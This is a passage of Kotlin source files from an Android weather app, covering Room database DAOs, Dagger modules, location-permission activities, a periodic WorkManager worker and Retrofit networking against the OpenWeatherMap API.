// val dataBase:WeatherDataBase=
@Provides
@Singleton
internal fun provideDatabase(@ApplicationContext application: Application): WeatherDataBase? {
return Room.databaseBuilder(
application,
WeatherDataBase::class.java, "weather_db"
).build()
}
@Provides
@Singleton
internal fun provideWeatherDataDao(weatherDataBase: WeatherDataBase): WeatherDataDao? {
return weatherDataBase.weatherDataDao()
}
@Provides
@Singleton
internal fun provideLocationDataDao(weatherDataBase: WeatherDataBase): LocationDataDao? {
return weatherDataBase.locationDataDao()
}
@Provides
@Singleton
internal fun provideWeatherRepository(weatherDataDao: WeatherDataDao,locationDataDao: LocationDataDao): WeatherDbRepositoryLis? {
return WeatherDbRepository(weatherDataDao,locationDataDao)
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/ui/WeatherPermissionActivity.kt
package com.geeta.weatherapp.ui
import android.Manifest
import android.annotation.SuppressLint
import android.app.Activity
import android.app.AlertDialog
import android.content.Context
import android.content.Intent
import android.content.pm.PackageManager
import android.location.LocationManager
import android.os.Bundle
import android.provider.Settings
import android.widget.Toast
import androidx.core.app.ActivityCompat
import androidx.lifecycle.Observer
import androidx.lifecycle.ViewModelProvider
import com.cafecraft.aps.ui.base.BaseActivity
import com.geeta.weatherapp.R
import com.geeta.weatherapp.ui.viewmodel.LocationViewModel
import com.geeta.weatherapp.utils.AppUtils
import com.geeta.weatherapp.utils.GPS_REQUEST
import com.geeta.weatherapp.utils.GpsUtils
import com.geeta.weatherapp.utils.LOCATION_REQUEST
import kotlinx.android.synthetic.main.activity_main.*
import javax.inject.Inject
class WeatherPermissionActivity :BaseActivity()
{
private var isGPSEnabled = false
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
setContentView(R.layout.activity_main)
GpsUtils(this).turnGPSOn(object : GpsUtils.OnGpsListener {
override fun gpsStatus(isGPSEnable: Boolean) {
this@WeatherPermissionActivity.isGPSEnabled = isGPSEnable
}
})
}
override fun onStart() {
super.onStart()
invokeLocationAction()
}
override fun onActivityResult(requestCode: Int, resultCode: Int, data: Intent?) {
super.onActivityResult(requestCode, resultCode, data)
if (resultCode == Activity.RESULT_OK) {
if (requestCode == GPS_REQUEST) {
isGPSEnabled = true
invokeLocationAction()
}
}
}
private fun invokeLocationAction() {
when {
!isGPSEnabled -> latLong.text = getString(R.string.kindly_enable_location)
isPermissionsGranted() -> startLocationUpdate()
shouldShowRequestPermissionRationale() -> latLong.text = getString(R.string.permission_request)
else -> ActivityCompat.requestPermissions(
this,
arrayOf(Manifest.permission.ACCESS_FINE_LOCATION, Manifest.permission.ACCESS_COARSE_LOCATION),
LOCATION_REQUEST
)
}
}
private fun startLocationUpdate() {
moveNextToFinishingIt(WeatherActivity::class.java)
}
private fun isPermissionsGranted() =
ActivityCompat.checkSelfPermission(
this,
Manifest.permission.ACCESS_FINE_LOCATION
) == PackageManager.PERMISSION_GRANTED &&
ActivityCompat.checkSelfPermission(
this,
Manifest.permission.ACCESS_COARSE_LOCATION
) == PackageManager.PERMISSION_GRANTED
private fun shouldShowRequestPermissionRationale() =
ActivityCompat.shouldShowRequestPermissionRationale(
this,
Manifest.permission.ACCESS_FINE_LOCATION
) && ActivityCompat.shouldShowRequestPermissionRationale(
this,
Manifest.permission.ACCESS_COARSE_LOCATION
)
@SuppressLint("MissingPermission")
override fun onRequestPermissionsResult(requestCode: Int, permissions: Array<String>, grantResults: IntArray) {
super.onRequestPermissionsResult(requestCode, permissions, grantResults)
when (requestCode) {
LOCATION_REQUEST -> {
invokeLocationAction()
}
}
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/ui/WeatherActivity.kt
package com.geeta.weatherapp.ui
import android.Manifest
import android.annotation.SuppressLint
import android.app.Activity
import android.app.AlertDialog
import android.content.Context
import android.content.Intent
import android.content.pm.PackageManager
import android.location.LocationManager
import android.os.Bundle
import android.provider.Settings
import android.view.View
import android.widget.Toast
import androidx.core.app.ActivityCompat
import androidx.core.content.ContextCompat
import androidx.databinding.DataBindingUtil
import androidx.lifecycle.Observer
import androidx.lifecycle.ViewModelProvider
import androidx.work.Data
import androidx.work.PeriodicWorkRequest
import androidx.work.WorkManager
import com.cafecraft.aps.ui.base.BaseActivity
import com.geeta.weatherapp.R
import com.geeta.weatherapp.data.weather.LocationModel
import com.geeta.weatherapp.data.weather.WeatherModel
import com.geeta.weatherapp.databinding.ActivityWeatherBinding
import com.geeta.weatherapp.ui.viewmodel.LocationViewModel
import com.geeta.weatherapp.ui.viewmodel.WeatherViewModel
import com.geeta.weatherapp.utils.*
import com.geeta.weatherapp.worker.WeatherWork
import kotlinx.android.synthetic.main.activity_weather.*
import java.util.concurrent.TimeUnit
import javax.inject.Inject
class WeatherActivity : BaseActivity() {
@Inject
lateinit var weatherViewModel: WeatherViewModel
@Inject
lateinit var locationViewModel: LocationViewModel
var PERMISSION_ID = 44
// var mFusedLocationClient: FusedLocationProviderClient? = null
lateinit var locationData:LocationModel
@Inject
lateinit var weatherViewModelFactory: ViewModelProvider.Factory
@Inject
lateinit var appData: AppData
private var mPeriodicWorkRequest: PeriodicWorkRequest? = null
lateinit var activityWeatherBinding: ActivityWeatherBinding
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
// setContentView(R.layout.activity_weather)
activityWeatherBinding = DataBindingUtil.setContentView(this, R.layout.activity_weather);
ViewModelProvider(this,weatherViewModelFactory).get(LocationViewModel::class.java)
ViewModelProvider(this,weatherViewModelFactory).get(WeatherViewModel::class.java)
setLiveDataListeners()
// startLocationUpdate()
cencelProidicWork()//workmenager cencel
}
override fun onStart() {
super.onStart()
// if(appData.locationModel==null)
startLocationUpdate()
if(appData.locationModel!=null)
weatherViewModel.getWeather()
}
private fun startLocationUpdate() {
// progressBar.visibility = View.VISIBLE
locationViewModel.getLocationData().observe(this, Observer {
if(appData.locationModel==null)
weatherViewModel.getWeather()
else if(appData.locationModel!=null && appData.locationModel?.longitude!=it.longitude
&& appData.locationModel?.latitude!=it.latitude )
weatherViewModel.getCurrentweather()
appData.locationModel=it
// progressBar.visibility = View.GONE
})
}
private fun setLiveDataListeners() {
/**
* If ViewModel failed to fetch weather , this LiveData will be triggered.
* I know it's not good to make separate LiveData both for Success and Failure, but for sake
* of simplification I did it. We can handle all of our errors from our Activity or Fragment
* Base classes. Another way is: using a Generic wrapper class where you can set the success
* or failure status for any types of data model.
*
* Here I've used lambda expression to implement Observer interface in second parameter.
*/
/* weatherViewModel.getLocationData()?.observe(this, Observer { locationData->
weatherViewModel.getWeather()
})*/
weatherViewModel.weatherInfoFailureLiveData.observe(this, Observer { errorMessage ->
Toast.makeText(this, errorMessage, Toast.LENGTH_LONG).show()
})
/**
* ProgressBar visibility will be handled by this LiveData. ViewModel decides when Activity
* should show ProgressBar and when hide.
*
* Here I've used lambda expression to implement Observer interface in second parameter.
*/
weatherViewModel.progressBarLiveData.observe(this, Observer { isShowLoader ->
if (isShowLoader)
progressBar.visibility = View.VISIBLE
else
progressBar.visibility = View.GONE
})
weatherViewModel.locationDetail.observe(this, Observer {
weatherViewModel.getCurrentweather()
})
/**
* This method will be triggered when ViewModel successfully receive WeatherData from our
* data source (I mean Model). Activity just observing (subscribing) this LiveData for showing
* weather information on UI. ViewModel receives Weather data API response from Model via
* Callback method of Model. Then ViewModel apply some business logic and manipulate data.
* Finally ViewModel PUSH WeatherData to `weatherInfoLiveData`. After PUSHING into it, below
* method triggered instantly! Then we set the data on UI.
*
* Here I've used lambda expression to implement Observer interface in second parameter.
*/
weatherViewModel.weatherData.observe(this, Observer { weatherData ->
setWeatherInfo(weatherData)
})
/**
* If ViewModel faces any error during Weather Info fetching API call by Model, then PUSH the
* error message into `weatherInfoFailureLiveData`. After that, this method will be triggered.
* Then we will hide the output view and show error message on UI.
*
* Here I've used lambda expression to implement Observer interface in second parameter.
*/
weatherViewModel.weatherInfoFailureLiveData.observe(this, Observer { errorMessage ->
showErrorinScreen(errorMessage)
showRetryAlertForWeather(errorMessage)
})
}
private fun showErrorinScreen(massage:String)
{
output_group.visibility = View.GONE
tv_error_message.visibility = View.VISIBLE
tv_error_message.text = massage
}
/* private fun forecastWeather() {
weatherViewModel.getWeather()
}*/
private fun setWeatherInfo(weatherData: WeatherModel) {
activityWeatherBinding.weatherdata=weatherData
output_group.visibility = View.VISIBLE
tv_error_message.visibility = View.GONE
}
fun startPerodicWork()
{
// var outData=Data.Builder().put(KEY_WEATHER,WeatherModel())
mPeriodicWorkRequest = PeriodicWorkRequest.Builder(
WeatherWork::class.java,
2, TimeUnit.HOURS
)
.addTag("periodicWorkRequest")
.build()
WorkManager.getInstance(this).enqueue(mPeriodicWorkRequest!!)
}
fun cencelProidicWork()
{
WorkManager.getInstance(this).cancelAllWork()
}
fun showRetryAlertForWeather(message: String) {
val builder = AlertDialog.Builder(this, R.style.MaterialAlertDialogStyle)
builder.setMessage(message).setTitle(R.string.app_name).setCancelable(true)
builder.setNeutralButton("Ok") { dialog, which ->
weatherViewModel.getWeather()
dialog.dismiss() }
builder.setNegativeButton(getString(R.string.cencel)){
dialog, which -> dialog.dismiss()
}
builder.create().show()
}
override fun onDestroy() {
super.onDestroy()
startPerodicWork()//start workmenager
appData.locationModel=null
}
}
<file_sep>/app/src/main/java/com/geeta/weatherapp/injection/module/WorkerModule.kt
package com.geeta.weatherapp.injection.module
import com.geeta.weatherapp.injection.scopes.WorkerModelKey
import com.geeta.weatherapp.worker.WeatherWork
import com.geeta.weatherapp.worker.WeatherWorkerFactory
import com.geeta.weatherapp.worker.WorkerSFactory
import dagger.Binds
import dagger.Module
import dagger.multibindings.IntoMap
@Module
abstract class WorkerModule {
@Binds
@IntoMap
@WorkerModelKey(WeatherWork::class)
abstract fun bindHelloWorldWorker(factory: WorkerSFactory): WeatherWorkerFactory
}<file_sep>/app/src/main/java/com/geeta/weatherapp/database/repositry/WeatherDbRepositoryLis.kt
package com.geeta.weatherapp.database.repositry
import androidx.lifecycle.LiveData
import com.geeta.weatherapp.data.weather.LocationModel
import com.geeta.weatherapp.data.weather.WeatherModel
import com.geeta.weatherapp.database.WeatherDataDao
import io.reactivex.Observable
interface WeatherDbRepositoryLis{
fun getWeatherDetail(): Observable<WeatherModel>
fun deletWeatherDetail()
fun insertWeatherDatail(weatherModel: WeatherModel)
fun getDateAndTime():Observable<List<Int>>
fun getLocation(): Observable<List<LocationModel>>
fun deletLocationDetail()
fun insertLocation(locationModel: LocationModel)
}<file_sep>/app/src/main/java/com/geeta/weatherapp/api/APIRestConstant.kt
package com.geeta.weatherapp.api
import com.geeta.weatherapp.BuildConfig
/**
* Created by Geetanjali.Naik on 02-02-2018.
*/
class APIRestConstant {
companion object {
const val BASE_API_URL = BuildConfig.BASE_URL/*"http://api.openweathermap.org/data/2.5/"*/
// http://api.openweathermap.org/data/2.5/weather?id=7778677&appid=5ad7218f2e11df834b0eaf3a33a39d2a
const val GET_WEATHER = "weather?"
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/data/weather/WeatherResponse.kt
package com.geeta.weatherapp.data.weather
import androidx.room.Embedded
import androidx.room.Entity
import androidx.room.PrimaryKey
import androidx.room.TypeConverters
import com.geeta.weatherapp.database.DataConverter
import com.google.gson.annotations.SerializedName
data class Coord(@SerializedName("lon")
var lon: Double? = 0.0,
@SerializedName("lat")
var lat: Double? = 0.0)
data class Wind(@SerializedName("deg")
var deg: Int? = 0,
@SerializedName("speed")
var speed: Double? = 0.0,
@SerializedName("gust")
var gust: Double? = 0.0)
data class Clouds(@SerializedName("all")
var all: Int? = 0)
@Entity
data class WeatherItem(@SerializedName("icon")
var icon: String? = "",
@SerializedName("description")
var description: String? = "",
@SerializedName("main")
var main: String? = "",
@SerializedName("id")
@PrimaryKey var weatherItemId: Int? = 0)
data class Sys(@SerializedName("country")
var country: String? = "",
@SerializedName("sunrise")
var sunrise: Int? = 0,
@SerializedName("sunset")
var sunset: Int? = 0,
@SerializedName("id")
var sysId: Int? = 0,
@SerializedName("type")
var type: Int? = 0)
data class Main(@SerializedName("temp")
var temp: Double? = 0.0,
@SerializedName("temp_min")
var tempMin: Double? = 0.0,
@SerializedName("humidity")
var humidity: Int? = 0,
@SerializedName("pressure")
var pressure: Double? = 0.0,
@SerializedName("feels_like")
var feelsLike: Double? = 0.0,
@SerializedName("temp_max")
var tempMax: Double? = 0.0)
@Entity(tableName = "WeatherData")
data class WeatherModel(@SerializedName("visibility")
var visibility: Int? = 0,
@SerializedName("timezone")
var timezone: Int? = 0,
@SerializedName("main")
@Embedded var main: Main?,
@SerializedName("clouds")
@Embedded var clouds: Clouds?,
@SerializedName("sys")
@Embedded var sys: Sys?,
@SerializedName("dt")
var dt: Int? = 0,
@SerializedName("coord")
@Embedded var coord: Coord?,
@TypeConverters(DataConverter::class)
@SerializedName("weather")
var weather: List<WeatherItem>??,
@SerializedName("name")
var name: String? = "",
@SerializedName("cod")
var cod: Int? = 0,
@SerializedName("id")
@PrimaryKey var weathModelId: Int? = 0,
@SerializedName("base")
var base: String? = "",
@SerializedName("wind")
@Embedded var wind: Wind?)
<file_sep>/app/src/main/java/com/geeta/weatherapp/worker/WeatherWork.kt
package com.geeta.weatherapp.worker
import android.annotation.SuppressLint
import android.content.Context
import android.location.Location
import android.util.Log
import androidx.work.Data
import androidx.work.Worker
import androidx.work.WorkerParameters
import com.geeta.weatherapp.R
import com.geeta.weatherapp.api.BaseApiManager
import com.geeta.weatherapp.api.datamanager.WeatherDataManager
import com.geeta.weatherapp.api.services.WeatherService
import com.geeta.weatherapp.data.weather.LocationModel
import com.geeta.weatherapp.database.repositry.WeatherDbRepository
import com.geeta.weatherapp.utils.AppUtils
import com.geeta.weatherapp.utils.CommonResponseParser
import com.google.android.gms.location.LocationServices
import io.reactivex.android.schedulers.AndroidSchedulers
import io.reactivex.schedulers.Schedulers
import javax.inject.Inject
class WeatherWork @Inject constructor( context: Context, workerParameters: WorkerParameters) : Worker(context,workerParameters) {
var weatherDataManager: WeatherDataManager? =null
override fun doWork(): Result {
Log.i("WEATHERAPP","Inside work")
if(AppUtils.isWifiNetworkAvailable(applicationContext))
getCurrentweather()
return Result.success()
}
@SuppressLint("CheckResult")
fun getCurrentweather()
{
Log.i("WEATHERAPP","Start API")
var serviceweather: WeatherService? = WorkmanagerNetwork.getClient()?.create(WeatherService::class.java)
Log.i("WEATHERAPP","Start API 111")
WeatherDbRepository.invoke(applicationContext).locationDataDao().getLocation()
.subscribeOn(Schedulers.newThread())
.flatMap { result->
if(result==null|| result.isEmpty())
throw Throwable(applicationContext.getString(R.string.unable_fatch_data))
else
return@flatMap serviceweather?.let {
WorkerRepository(it).updateWeather(result[0].latitude,result[0].longitude)}
}
.map{result->
var weatherDataDao=WeatherDbRepository.invoke(applicationContext).weatherDataDao()
weatherDataDao.deleteAll()
weatherDataDao.insertWeather(result)
return@map result
}
.subscribe()
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/worker/WorkmanagerNetwork.kt
package com.geeta.weatherapp.worker
import com.geeta.weatherapp.BuildConfig
import com.geeta.weatherapp.api.BaseApiManager
import com.geeta.weatherapp.network.ErrorInterceptor
import com.jakewharton.retrofit2.adapter.rxjava2.RxJava2CallAdapterFactory
import okhttp3.OkHttpClient
import okhttp3.logging.HttpLoggingInterceptor
import retrofit2.Retrofit
import retrofit2.converter.gson.GsonConverterFactory
import retrofit2.converter.scalars.ScalarsConverterFactory
import java.util.concurrent.TimeUnit
class WorkmanagerNetwork {
companion object {
fun getClient(): Retrofit? {
val interceptor = HttpLoggingInterceptor()
interceptor.setLevel(HttpLoggingInterceptor.Level.BODY)
val client =
OkHttpClient.Builder()
.connectTimeout(1200.toLong(), TimeUnit.SECONDS)
.readTimeout(1200.toLong(), TimeUnit.SECONDS)
.addInterceptor(interceptor)
.addInterceptor(ErrorInterceptor())
.build()
var retrofit = Retrofit.Builder()
.baseUrl(BuildConfig.BASE_URL)
.addConverterFactory(ScalarsConverterFactory.create())
.addConverterFactory(GsonConverterFactory.create())
.addCallAdapterFactory(RxJava2CallAdapterFactory.create())
.client(client)
.build()
return retrofit
}
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/database/WeatherDataDao.kt
package com.geeta.weatherapp.database
import androidx.room.*
import androidx.room.OnConflictStrategy.REPLACE
import com.geeta.weatherapp.data.weather.WeatherModel
import io.reactivex.Maybe
import io.reactivex.Observable
@Dao
interface WeatherDataDao {
@Query("SELECT * from weatherData")
fun getWeather(): Observable<WeatherModel>
@Query("SELECT dt from weatherData")
fun getDate():Observable<List<Int>>
@Query("SELECT dt from weatherData")
fun getWeatherDataDT():Int
@Insert(onConflict = REPLACE)
fun insertWeather(weatherData: WeatherModel)
@Query("DELETE from weatherData")
fun deleteAll()
}<file_sep>/app/src/main/java/com/geeta/weatherapp/database/repositry/LocationDataDao.kt
package com.geeta.weatherapp.database.repositry
import androidx.room.Dao
import androidx.room.Insert
import androidx.room.OnConflictStrategy
import androidx.room.Query
import com.geeta.weatherapp.data.weather.LocationModel
import io.reactivex.Observable
@Dao
interface LocationDataDao {
@Query("SELECT * from locationData")
fun getLocation(): Observable<List<LocationModel>>
@Insert(onConflict = OnConflictStrategy.REPLACE)
fun insertLocation(weatherData: LocationModel)
@Query("DELETE from locationData")
fun deleteAll()
}<file_sep>/app/src/main/java/com/geeta/weatherapp/database/WeatherDataBase.kt
package com.geeta.weatherapp.database
import androidx.room.Database
import androidx.room.RoomDatabase
import androidx.room.TypeConverters
import com.geeta.weatherapp.data.weather.LocationModel
import com.geeta.weatherapp.data.weather.WeatherModel
import com.geeta.weatherapp.database.DataConverter
import com.geeta.weatherapp.database.WeatherDataDao
import com.geeta.weatherapp.database.repositry.LocationDataDao
import javax.inject.Inject
@Database(entities = arrayOf(WeatherModel::class,LocationModel::class), version = 1, exportSchema = false)
@TypeConverters(DataConverter::class)
abstract class WeatherDataBase :RoomDatabase() {
abstract fun weatherDataDao(): WeatherDataDao
abstract fun locationDataDao():LocationDataDao
}<file_sep>/app/src/main/java/com/geeta/weatherapp/utils/AppData.kt
package com.geeta.weatherapp.utils
import android.view.View
import android.widget.TextView
import androidx.databinding.BindingAdapter
import com.geeta.weatherapp.data.weather.LocationModel
const val KEY_WEATHER = "KEY_WEATHER"
class AppData{
var aapkey: String = ""
var locationModel:LocationModel?=null
}
const val LOCATION_REQUEST = 100
const val GPS_REQUEST = 101
@BindingAdapter("android:timestamp")
public fun setTimeStamp(view: TextView, time:Int){
view.text=time.unixTimestampToTimeString()
}
@BindingAdapter("android:dateTime")
public fun setDate(view: TextView, time:Int){
view.text=time.unixTimestampToDateTimeString()
}
@BindingAdapter("android:visibilitytext")
public fun setVisibilityText(view: TextView, visibility:Int){
view.text="${visibility?.div(1000.0)} KM"
}
@BindingAdapter("android:temperature")
public fun settemperature(view: TextView, temperature:Double){
view.text=temperature.kelvinToCelsius().toString()
}
<file_sep>/app/src/main/java/com/geeta/weatherapp/ui/viewmodel/LocationViewModel.kt
package com.geeta.weatherapp.ui.viewmodel
import android.app.Application
import androidx.lifecycle.AndroidViewModel
import com.geeta.weatherapp.ui.livedata.LocationLiveData
import javax.inject.Inject
class LocationViewModel @Inject constructor(application: Application) : AndroidViewModel(application) {
private val locationData = LocationLiveData(application)
fun getLocationData() = locationData
}<file_sep>/app/src/main/java/com/geeta/weatherapp/injection/scopes/PerApplication.kt
package com.geeta.weatherapp.injection.scopes
import javax.inject.Qualifier
import javax.inject.Scope
@Scope
@Retention(AnnotationRetention.RUNTIME)
annotation class PerApplication
@Scope
@Retention(AnnotationRetention.RUNTIME)
annotation class ApplicationContext<file_sep>/app/src/main/java/com/geeta/weatherapp/WeatherApplication.kt
package com.geeta.weatherapp
import android.content.Context
import androidx.multidex.MultiDexApplication
import com.facebook.stetho.Stetho
import com.geeta.weatherapp.injection.ApplicationComponent
import com.geeta.weatherapp.injection.DaggerApplicationComponent
//import com.geeta.weatherapp.injection.DaggerApplicationComponent
import dagger.android.*
import javax.inject.Inject
open class WeatherApplication: MultiDexApplication() , HasAndroidInjector {
// lateinit var applicationComponent: DaggerApplicationComponent
@Inject
lateinit var anyDispatchingAndroidInjector: DispatchingAndroidInjector<Any>
// val appComponent = DaggerApplicationComponent.create()
override fun onCreate() {
super.onCreate()
appContext=this
buildComponent()
// setUpStethoInspector()
}
open fun buildComponent(){
DaggerApplicationComponent.builder().application(this)
.build().inject(this)
} /*:ApplicationComponent=
DaggerApplicationComponent.builder().application(this)
.build()*/
companion object {
var appContext: Context? = null
var applicationComponent:ApplicationComponent?=null
fun getApplicationComponet():ApplicationComponent?{
return applicationComponent
}
fun getApplicationContext(): Context? {
return appContext
}
}
override fun androidInjector(): AndroidInjector<Any> {
return anyDispatchingAndroidInjector
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/injection/ApplicationComponent.kt
package com.geeta.weatherapp.injection
import android.app.Application
import com.geeta.weatherapp.WeatherApplication
import com.geeta.weatherapp.database.WeatherDataBase
import com.geeta.weatherapp.database.repositry.WeatherDbRepositoryLis
import com.geeta.weatherapp.injection.module.ActivityBindingModule
import com.geeta.weatherapp.injection.module.AppViewModule
import com.geeta.weatherapp.injection.module.DataBaseModule
import com.geeta.weatherapp.injection.module.WorkerModule
import com.geeta.weatherapp.injection.scopes.PerApplication
import com.geeta.weatherapp.network.NetworkModule
import dagger.BindsInstance
import dagger.Component
import dagger.android.support.AndroidSupportInjectionModule
import javax.inject.Singleton
@PerApplication
@Singleton
@Component(modules = arrayOf(
AndroidSupportInjectionModule::class,
ActivityBindingModule::class,
/*WeatherApplicationModule::class,*/
NetworkModule::class,
/*DataBaseModule::class,*/
WorkerModule::class,
AppViewModule::class))
interface ApplicationComponent {
@Component.Builder
interface Builder {
@BindsInstance
fun application(application: Application): Builder
/* @BindsInstance
fun dataModule(dataBaseModule: DataBaseModule):Builder*/
fun build(): ApplicationComponent
}
fun inject(app: WeatherApplication)
}
<file_sep>/app/src/main/java/com/geeta/weatherapp/injection/module/ActivityBindingModule.kt
package com.geeta.weatherapp.injection.module
import com.geeta.weatherapp.injection.scopes.PerActivity
import com.geeta.weatherapp.ui.WeatherActivity
import com.geeta.weatherapp.ui.WeatherPermissionActivity
import dagger.Module
import dagger.android.ContributesAndroidInjector
@Module
abstract class ActivityBindingModule() {
@PerActivity
@ContributesAndroidInjector
abstract fun weatherPermissionActivity(): WeatherPermissionActivity
@PerActivity
@ContributesAndroidInjector
abstract fun weatherActivity(): WeatherActivity
}<file_sep>/app/src/main/java/com/geeta/weatherapp/worker/WorkerRepository.kt
package com.geeta.weatherapp.worker
import com.geeta.weatherapp.BuildConfig
import com.geeta.weatherapp.api.services.WeatherService
import com.geeta.weatherapp.data.weather.WeatherModel
import io.reactivex.Observable
class WorkerRepository(val weatherService: WeatherService) {
fun updateWeather(lat:Double,lon:Double): Observable<WeatherModel>
{
return weatherService.getCurrentWeather(lat,lon,BuildConfig.APP_ID)
}
}
<file_sep>/app/src/main/java/com/geeta/weatherapp/api/datamanager/WeatherDataManager.kt
package com.geeta.weatherapp.api.datamanager
import android.app.Application
import com.geeta.weatherapp.BuildConfig
import com.geeta.weatherapp.api.BaseApiManager
import com.geeta.weatherapp.data.weather.WeatherModel
import com.geeta.weatherapp.database.WeatherDataBase
import com.geeta.weatherapp.database.repositry.WeatherDbRepository
import com.geeta.weatherapp.utils.AppData
import io.reactivex.Observable
import javax.inject.Inject
class WeatherDataManager @Inject constructor(var mBaseApiManager: BaseApiManager/*,var weatherDbRepository: WeatherDbRepository */) {
@Inject
lateinit var appData: AppData
@Inject
lateinit var application: Application
fun updateWeather(lat :Double,lon:Double): Observable<WeatherModel>
{
return mBaseApiManager.weatherService.getCurrentWeather(lat,lon,BuildConfig.APP_ID)
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/ui/livedata/LocationLiveData.kt
package com.geeta.weatherapp.ui.livedata
import android.annotation.SuppressLint
import android.content.Context
import android.location.Location
import androidx.lifecycle.LiveData
import androidx.lifecycle.Observer
import com.geeta.weatherapp.data.weather.LocationModel
import com.geeta.weatherapp.database.repositry.WeatherDbRepository
import com.google.android.gms.location.LocationCallback
import com.google.android.gms.location.LocationRequest
import com.google.android.gms.location.LocationResult
import com.google.android.gms.location.LocationServices
import io.reactivex.Completable
import io.reactivex.schedulers.Schedulers
import javax.inject.Inject
class LocationLiveData @Inject constructor(val context: Context) : LiveData<LocationModel>() {
private var fusedLocationClient = LocationServices.getFusedLocationProviderClient(context)
override fun onInactive() {
super.onInactive()
fusedLocationClient.removeLocationUpdates(locationCallback)
}
@SuppressLint("MissingPermission")
override fun onActive() {
super.onActive()
fusedLocationClient.lastLocation
.addOnSuccessListener { location: Location? ->
location?.also {
setLocationData(it)
}
}
startLocationUpdates()
}
@SuppressLint("MissingPermission")
private fun startLocationUpdates() {
fusedLocationClient.requestLocationUpdates(
locationRequest,
locationCallback,
null
)
}
private val locationCallback = object : LocationCallback() {
override fun onLocationResult(locationResult: LocationResult?) {
locationResult ?: return
for (location in locationResult.locations) {
setLocationData(location)
}
}
}
private fun setLocationData(location: Location) {
value = LocationModel(
longitude = location.longitude,
latitude = location.latitude
)
Completable.fromRunnable(Runnable{
var locationDataDao= WeatherDbRepository.invoke(context).locationDataDao()
locationDataDao.deleteAll()
locationDataDao.insertLocation(value!!)
})
.subscribeOn(Schedulers.io())
.subscribe()
}
companion object {
val locationRequest: LocationRequest = LocationRequest.create().apply {
interval = 1000
fastestInterval = 5000
priority = LocationRequest.PRIORITY_HIGH_ACCURACY
}
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/worker/WorkerSFactory.kt
package com.geeta.weatherapp.worker
import android.content.Context
import androidx.work.Worker
import androidx.work.WorkerParameters
import javax.inject.Inject
class WorkerSFactory @Inject constructor() : WeatherWorkerFactory{
override fun create(appContext: Context, params: WorkerParameters): Worker {
return WeatherWork(appContext,params)
}
}
<file_sep>/app/src/main/java/com/geeta/weatherapp/data/ErrorResponse.kt
package com.geeta.weatherapp.data
import com.google.gson.annotations.SerializedName
data class ErrorResponse(
@SerializedName("defaultUserMessage")
var mDefaultUserMessage: String? = "",
@SerializedName("developerMessage")
var mDeveloperMessage: String? = "",
@SerializedName("httpStatusCode")
var mHttpStatusCode: String? = "",
@SerializedName("userMessageGlobalisationCode")
var mUserMessageGlobalisationCode: String? = "",
@SerializedName("errors")
var errors: List<Errors> = listOf()
) {
data class Errors(
@SerializedName("developerMessage")
var developerMessage: String? = "",
@SerializedName("defaultUserMessage")
var defaultUserMessage: String? = "",
@SerializedName("userMessageGlobalisationCode")
var userMessageGlobalisationCode: String? = "",
@SerializedName("parameterName")
var parameterName: String? = ""
)
}<file_sep>/app/src/main/java/com/geeta/weatherapp/injection/scopes/PerFragment.kt
package com.geeta.weatherapp.injection.scopes
import javax.inject.Scope
/**
* Created by Geetanjali on 05/01/18.
*/
@Scope
@Retention(AnnotationRetention.RUNTIME)
annotation class PerFragment<file_sep>/app/src/main/java/com/geeta/weatherapp/injection/scopes/WorkerModelKey.kt
package com.geeta.weatherapp.injection.scopes
import androidx.lifecycle.ViewModel
import androidx.work.Worker
import dagger.MapKey
import java.lang.annotation.*
import java.lang.annotation.Retention
import java.lang.annotation.Target
import kotlin.reflect.KClass
@Documented
@Target(ElementType.METHOD)
@Retention(RetentionPolicy.RUNTIME)
@MapKey
internal annotation class WorkerModelKey(val value: KClass<out Worker>)<file_sep>/app/src/main/java/com/geeta/weatherapp/utils/CommonResponseParser.kt
package com.geeta.weatherapp.utils
import com.geeta.weatherapp.data.ErrorResponse
import com.google.gson.Gson
import retrofit2.HttpException
import java.io.IOException
/**
* Created by Geeta on 20/08/18.
*/
class CommonResponseParser {
object CONSTANT {
val SUCCESS = 1
val FAILURE = 0
}
object ErrorParser {
fun parseError(throwableError: Throwable, isReadMessage: Boolean): String? {
val errorMessage: String
try {
if (throwableError is HttpException) {
errorMessage = throwableError.response()?.errorBody()!!.string()
val status = Gson().fromJson(errorMessage, ErrorResponse::class.java)
return if (isReadMessage) {
status.mDeveloperMessage
} else {
status.mHttpStatusCode
}
}
else if(throwableError is HttpException)
{
errorMessage = throwableError.response()?.errorBody()!!.string()
val status = Gson().fromJson(errorMessage, ErrorResponse::class.java)
return if (isReadMessage) {
status.mDeveloperMessage
} else {
status.mHttpStatusCode
}
}
return if (throwableError is IOException) {
throwableError.message
} else
throwableError.message
} catch (throwable: Throwable) {
return "Something went wrong"
}
}
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/utils/AppUtils.kt
package com.geeta.weatherapp.utils
import android.content.Context
import android.content.pm.PackageManager
import android.net.ConnectivityManager
import android.net.NetworkCapabilities
import android.os.Build
import android.os.Environment
import android.os.StatFs
import java.text.ParseException
import java.text.SimpleDateFormat
import java.util.*
import java.net.Inet4Address
import java.net.NetworkInterface
import java.net.SocketException
/**
* Created by Geeta on 04/02/19.
*/
class AppUtils {
companion object {
fun isNetworkAvailable(context: Context): Boolean {
var result = false
val connectivityManager = context.getSystemService(Context.CONNECTIVITY_SERVICE) as ConnectivityManager
if(Build.VERSION.SDK_INT >= Build.VERSION_CODES.M){
val networkCapabilities = connectivityManager.activeNetwork ?: return false
val actNw =
connectivityManager.getNetworkCapabilities(networkCapabilities) ?: return false
result = when {
actNw.hasTransport(NetworkCapabilities.TRANSPORT_WIFI) -> true
actNw.hasTransport(NetworkCapabilities.TRANSPORT_CELLULAR) -> true
actNw.hasTransport(NetworkCapabilities.TRANSPORT_ETHERNET) -> true
else -> false
}
}else{
val activeNetworkInfo = connectivityManager.activeNetworkInfo
result= activeNetworkInfo != null && activeNetworkInfo.isConnected
}
return result
}
fun isWifiNetworkAvailable(context: Context): Boolean {
var result = false
val connectivityManager =
